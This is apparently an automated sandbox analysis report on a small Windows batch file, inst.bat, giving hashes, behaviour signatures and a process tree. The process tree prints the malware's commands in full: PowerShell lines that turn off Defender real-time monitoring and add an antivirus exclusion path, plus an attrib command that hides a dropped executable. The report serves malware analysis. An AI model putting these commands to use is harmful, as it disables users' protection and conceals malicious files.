Analysis
-
max time kernel
22s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06-10-2024 13:38
Static task
static1
Behavioral task
behavioral1
Sample
inst.bat
Resource
win7-20240903-en
General
-
Target
inst.bat
-
Size
713B
-
MD5
ba7d5c2094c82a1cfa6a2db0797b53fe
-
SHA1
289145bbb2d21f3098b9870a0eac65024172b3a5
-
SHA256
cf083f834a6dbcf2c3e91f705fa4188fc590261ee4111e3eb61daf3e3b6ca6c8
-
SHA512
eabcc7e8cd57a62f52595c731c3ab52bfd6de889535ba509f092cd299b2f73dc0ff3b407b33e6ea48fbfeaa48f2ed39d071424587b418b2640801a8ca95fd5bb
Malware Config
Signatures
-
pid Process 1512 powershell.exe 2832 powershell.exe 3012 powershell.exe 2696 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1512 powershell.exe 2696 powershell.exe 2832 powershell.exe 3012 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1512 powershell.exe Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 2832 powershell.exe Token: SeDebugPrivilege 3012 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2432 wrote to memory of 588 2432 cmd.exe 32 PID 2432 wrote to memory of 588 2432 cmd.exe 32 PID 2432 wrote to memory of 588 2432 cmd.exe 32 PID 588 wrote to memory of 2016 588 net.exe 33 PID 588 wrote to memory of 2016 588 net.exe 33 PID 588 wrote to memory of 2016 588 net.exe 33 PID 2432 wrote to memory of 1512 2432 cmd.exe 34 PID 2432 wrote to memory of 1512 2432 cmd.exe 34 PID 2432 wrote to memory of 1512 2432 cmd.exe 34 PID 2432 wrote to memory of 2696 2432 cmd.exe 35 PID 2432 wrote to memory of 2696 2432 cmd.exe 35 PID 2432 wrote to memory of 2696 2432 cmd.exe 35 PID 2432 wrote to memory of 2836 2432 cmd.exe 36 PID 2432 wrote to memory of 2836 2432 cmd.exe 36 PID 2432 wrote to memory of 2836 2432 cmd.exe 36 PID 1344 wrote to memory of 2344 1344 cmd.exe 39 PID 1344 wrote to memory of 2344 1344 cmd.exe 39 PID 1344 wrote to memory of 2344 1344 cmd.exe 39 PID 2344 wrote to memory of 2740 2344 net.exe 40 PID 2344 wrote to memory of 2740 2344 net.exe 40 PID 2344 wrote to memory of 2740 2344 net.exe 40 PID 1344 wrote to memory of 2832 1344 cmd.exe 41 PID 1344 wrote to memory of 2832 1344 cmd.exe 41 PID 1344 wrote to memory of 2832 1344 cmd.exe 41 PID 1344 wrote to memory of 3012 1344 cmd.exe 42 PID 1344 wrote to memory of 3012 1344 cmd.exe 42 PID 1344 wrote to memory of 3012 1344 cmd.exe 42 PID 1344 wrote to memory of 616 1344 cmd.exe 43 PID 1344 wrote to memory of 616 1344 cmd.exe 43 PID 1344 wrote to memory of 616 1344 cmd.exe 43 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2836 attrib.exe 616 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\inst.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2016
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32\drivers\etc'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\windows\system32\drivers\etc\rizzing.exe"2⤵
- Views/modifies file attributes
PID:2836
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2740
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32\drivers\etc'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\windows\system32\drivers\etc\rizzing.exe"2⤵
- Views/modifies file attributes
PID:616
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51d3189a0f6d21a70ee21eee754cc13f3
SHA1e1dc04af59326de12f4801dc3038a2aaee037351
SHA25633cabb3b0f84f8a6a8f3ec2b8b83d339255184c3aca2ccbca206b8725f79bea3
SHA51266ca1a136c861420fd6b6c95f9039966944a3fccc31da6a81919d61333c155544be39c6149de1c3449fee4037607b5ca710685a94e79d22831f07662cfe420af
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cacc82dc7bdd9f5ecfbce0ad9c0c8d22
SHA19795fe2a22505e0d4548caae9b273d43cdaa25dc
SHA2561ddb40fa16f17267e7c15e60015754f4af9e1eb921d709071d626c99e5afbc51
SHA5128a4b0f955889bf99917e5817c8264bbf67efede945965b4baf9459353e4f14826a882eda17458622f838cd32efd8c72072a535235cce9f08e5bf44d34428412b